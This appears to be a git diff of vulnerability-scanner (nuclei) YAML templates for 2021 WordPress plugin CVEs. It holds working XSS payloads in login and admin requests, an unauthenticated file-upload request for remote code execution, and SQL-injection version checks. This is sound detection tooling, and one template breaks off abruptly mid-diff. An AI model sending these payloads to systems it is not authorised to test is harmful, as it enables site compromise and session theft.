publicwww-query: /wp-content/plugins/controlled-admin-access/ - tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access + tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: - raw: @@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4a0a00473045022013b479f4f410acfdfb3301d103479ad1cfc917c18b27f2bef2033bd51a62cf33022100b919927b38062637e7d7548773b2dd24b78978e550eff0b1980ad429eed014fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24226.yaml b/nuclei-templates/CVE-2021/CVE-2021-24226.yaml deleted file mode 100644 index 26a6c6b694..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24226.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2021-24226 -info: - name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage - author: dhiyaneshDK - severity: high - description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. - reference: - - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-24226 - cwe-id: CWE-200 - tags: wordpress,cve,cve2021,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - '
alert(document.domain);") && contains(body, "invitaion-code-table")' condition: and -# digest: 4a0a0047304502210086d3d3e184d6a9be220f658380cdca7fca88fbc2b1af53e9554e5c7310d39391022022dda7bb82664acee182d59cb4d7082c7e4faed61b2961741b17e7b53f3837ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24245.yaml b/nuclei-templates/CVE-2021/CVE-2021-24245.yaml deleted file mode 100644 index 9e7991f39e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24245.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-24245 - -info: - name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting - author: edoardottt - severity: medium - description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. - reference: - - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html - - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24245 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24245 - cwe-id: CWE-79 - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP+Cookie+check; - - log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "ad\" accesskey=X onclick=alert(1)" - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-24274.yaml b/nuclei-templates/CVE-2021/CVE-2021-24274.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24274.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24274.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml index f89c216090..f2e969c7a6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml @@ -1,15 +1,10 @@ id: CVE-2021-24284 - info: - name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload + name: WordPress Kaswara Modern VC Addons - File Upload RCE author: lamscun,pussycat0x,pdteam severity: critical description: | - WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - impact: | - Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website. - remediation: | - Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability. + The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. reference: - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 @@ -22,23 +17,12 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96657 - epss-percentile: 0.99614 - cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: kaswara_project - product: kaswara - framework: wordpress - tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project - + tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" - string: "CVE-2021-24284" - php_cmd: "" - -http: + php_cmd: "" +requests: - raw: - | POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 @@ -62,20 +46,17 @@ http: - | GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers-condition: and matchers: - type: word part: body_1 words: - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - type: word part: body_2 words: - - '{{md5(string)}}' - + - "phpinfo()" - type: status status: - 200 -# digest: 4a0a00473045022100f0e469315d27c1e2b10e7997e7bd0501633f74806e35bf505925a7267a1eaee502204bacf6f2af3b3841aea43702a619a936d0ddcde2bd2b41be0be741e4f77e6778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24285.yaml b/nuclei-templates/CVE-2021/CVE-2021-24285.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24285.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24285.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24286.yaml b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml index e3b6286721..44f7dffcf1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24286.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24286 - info: name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting author: geeknik @@ -7,12 +6,10 @@ info: reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 severity: medium tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and matchers: - type: word diff --git a/nuclei-templates/CVE-2021/CVE-2021-24287.yaml b/nuclei-templates/CVE-2021/CVE-2021-24287.yaml index 4c51d66e9d..74cc20d62f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24287.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24287.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.3.2. reference: - https://www.exploit-db.com/exploits/50349 - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24287 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24287 cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54794 + epss-score: 0.00231 + epss-percentile: 0.60494 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: mooveagency product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons framework: wordpress - tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb + tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and -# digest: 4a0a00473045022030a560a5c07626c72709d689a6c2ab6dfcc0a5a767ff25cf3f105b5c2ac5eae90221008a0f57a80a4d1f036d9996eb44b9263a3e0cf91a6cfb5dea0bccfb921d61102d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24291.yaml b/nuclei-templates/CVE-2021/CVE-2021-24291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24291.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml index 33ab74ea05..04d0926f66 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24300 - info: name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS author: cckuailong @@ -14,7 +13,6 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - requests: - raw: - | @@ -28,7 +26,6 @@ requests: - | GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: @@ -38,12 +35,10 @@ requests: - 'value="\"onmouseover=alert(document.domain);//">' - "PickPlugins Product Slider" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24335.yaml b/nuclei-templates/CVE-2021/CVE-2021-24335.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24335.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24335.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24347.yaml b/nuclei-templates/CVE-2021/CVE-2021-24347.yaml index 44c78cc587..4177f7e372 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24347.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24347.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site. remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a @@ -17,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.96951 - epss-percentile: 0.9966 + epss-score: 0.97036 + epss-percentile: 0.99699 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: smartypantsplugins product: sp_project_\&_document_manager framework: wordpress - tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive + tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins http: - raw: @@ -99,4 +101,4 @@ http: regex: - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)" internal: true -# digest: 490a0046304402201efdb38e7f78d3e9e3dc741544c1525190a14dea497989a6414146d4a34d2026022019290fd72e41e0578668f4b65b3c17ce41825eca3c5304b2cb9e5da70679f88d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24351.yaml b/nuclei-templates/CVE-2021/CVE-2021-24351.yaml index f6fed292bc..6406ee8919 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24351.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24351.yaml @@ -6,26 +6,30 @@ info: severity: medium description: | WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016 - https://theplusaddons.com/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24351 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/JoshMorrison99/my-nuceli-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24351 cwe-id: CWE-79 - epss-score: 0.00145 - epss-percentile: 0.50199 + epss-score: 0.00154 + epss-percentile: 0.50743 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth http: - raw: @@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024e98f0f5b2965f78ab57c62d96737c5001b2285dc70cc044fb1ab99178fa614022100e49e417af37c9e95ddb7cb9577b2cc0ae9dc566ded8b815b52db7c0764b72c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24370.yaml b/nuclei-templates/CVE-2021/CVE-2021-24370.yaml new file mode 100644 index 0000000000..a06cf1d193 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24370.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-24370 + +info: + name: WordPress Fancy Product Designer <4.6.9 - Arbitrary File Upload + author: pikpikcu + severity: critical + description: | + WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication. + impact: | + Attackers can upload malicious files and execute arbitrary code on the target system. + remediation: | + Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability. + reference: + - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/ + - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38 + - https://seclists.org/fulldisclosure/2020/Nov/30 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24370 + - https://www.secpod.com/blog/critical-zero-day-flaw-actively-exploited-in-wordpress-fancy-product-designer-plugin/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24370 + cwe-id: CWE-434 + epss-score: 0.11015 + epss-percentile: 0.95013 + cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: radykal + product: fancy_product_designer + framework: wordpress + google-query: inurl:“/wp-content/plugins/fancy-product-designer” + tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"error":"You need to define a directory' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100c2a776e835f61bf3a78c76dd792d53c9c3bcfaf7974a24228b4f5e0a66ab0f2902210097e6ed969dab62237e84218f8f15915a107d24ce90adc20993b9d949a9e68aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24385.yaml b/nuclei-templates/CVE-2021/CVE-2021-24385.yaml index 47849aa752..12fd1dd4c1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24385.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24385.yaml @@ -1,31 +1,46 @@ id: CVE-2021-24385 info: - name: Filebird < 4.7.4 - Unauthenticated SQL Injection - author: akincibor + name: > + Filebird 4.7.3 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user. + description: > + The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user. reference: - - https://wpscan.com/vulnerability/754ac750-0262-4f65-b23e-d5523995fbfa - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2491d502-8087-4e95-b047-a3b196322d94?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24385 + metadata: + fofa-query: "wp-content/plugins/filebird/" + google-query: inurl:"/wp-content/plugins/filebird/" + shodan-query: 'vuln:CVE-2021-24385' + tags: cve,wordpress,wp-plugin,filebird,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/filebird/readme.txt' + - "{{BaseURL}}/wp-content/plugins/filebird/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "FileBird" + - "filebird" part: body - type: dsl dsl: - - compare_versions(version, '< 4.7.4') \ No newline at end of file + - compare_versions(version, '4.7.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24409.yaml b/nuclei-templates/CVE-2021/CVE-2021-24409.yaml index f26e4c26fd..f91d354aeb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24409.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24409.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24409 cwe-id: CWE-79 - epss-score: 0.00188 - epss-percentile: 0.56172 + epss-score: 0.00161 + epss-percentile: 0.51755 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: prismatic framework: wordpress publicwww-query: "/wp-content/plugins/prismatic" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated + tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 490a0046304402202942c50fbf7bf1294a2bca04ea6c75f30affca721513ba5fae26662cb41a744c02203ca3eba39c430acf695ef0646f86a0697c25b9fc788f15c49795ddb2257fcc61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24435.yaml b/nuclei-templates/CVE-2021/CVE-2021-24435.yaml index 6a612a9a13..e8d4e6ca7e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24435.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24435.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435 - https://nvd.nist.gov/vuln/detail/CVE-2021-24435 - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49432 + epss-percentile: 0.4866 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: gambit product: titan_framework framework: wordpress - tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress + tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit http: - method: GET @@ -53,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009520e207a798498c4436f2eb4315a0cd962a41bd6958665705b91c157f4a3c6d022100811df242ef8ffc8303493f7be1dcee1df01d06040e8694b6e69e23ffe445b219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24436.yaml b/nuclei-templates/CVE-2021/CVE-2021-24436.yaml index fb0532a5c7..899f45d529 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24436.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24436.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.4. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 - https://wordpress.org/plugins/w3-total-cache/ - https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef - https://nvd.nist.gov/vuln/detail/CVE-2021-24436 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40981 + epss-percentile: 0.4009 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid http: - raw: @@ -47,4 +50,4 @@ http: - contains(body_2, '>&action=view') - contains(header_2, "text/html") condition: and -# digest: 490a0046304402204bd06f570fded8c00ff6c7aeb2adbb97a84081d1edca516c5a478dcc470b1b5f0220102d2a67cbc3801f61791b5bee4f20d9a4e24d93c2cbe8137b550d672d0210fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ef6e350c911751d8d5e81ed50cb77824d6c9a7d2c0f9d5ea8e46a0be6ed7eb60220354d8aed65ef0a2257c2b945941807aa31ab5378f1612ae21f59f25020ef5de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24442.yaml b/nuclei-templates/CVE-2021/CVE-2021-24442.yaml index 22d58062f1..b27503e1ae 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24442.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24442.yaml @@ -1,43 +1,49 @@ id: CVE-2021-24442 info: - name: Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection - author: akincibor + name: Wordpress Polls Widget < 1.5.3 - SQL Injection + author: ritikchaddha severity: critical - description: The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks. + description: | + The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks + remediation: Fixed in 1.5.3 reference: - - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24442 + - 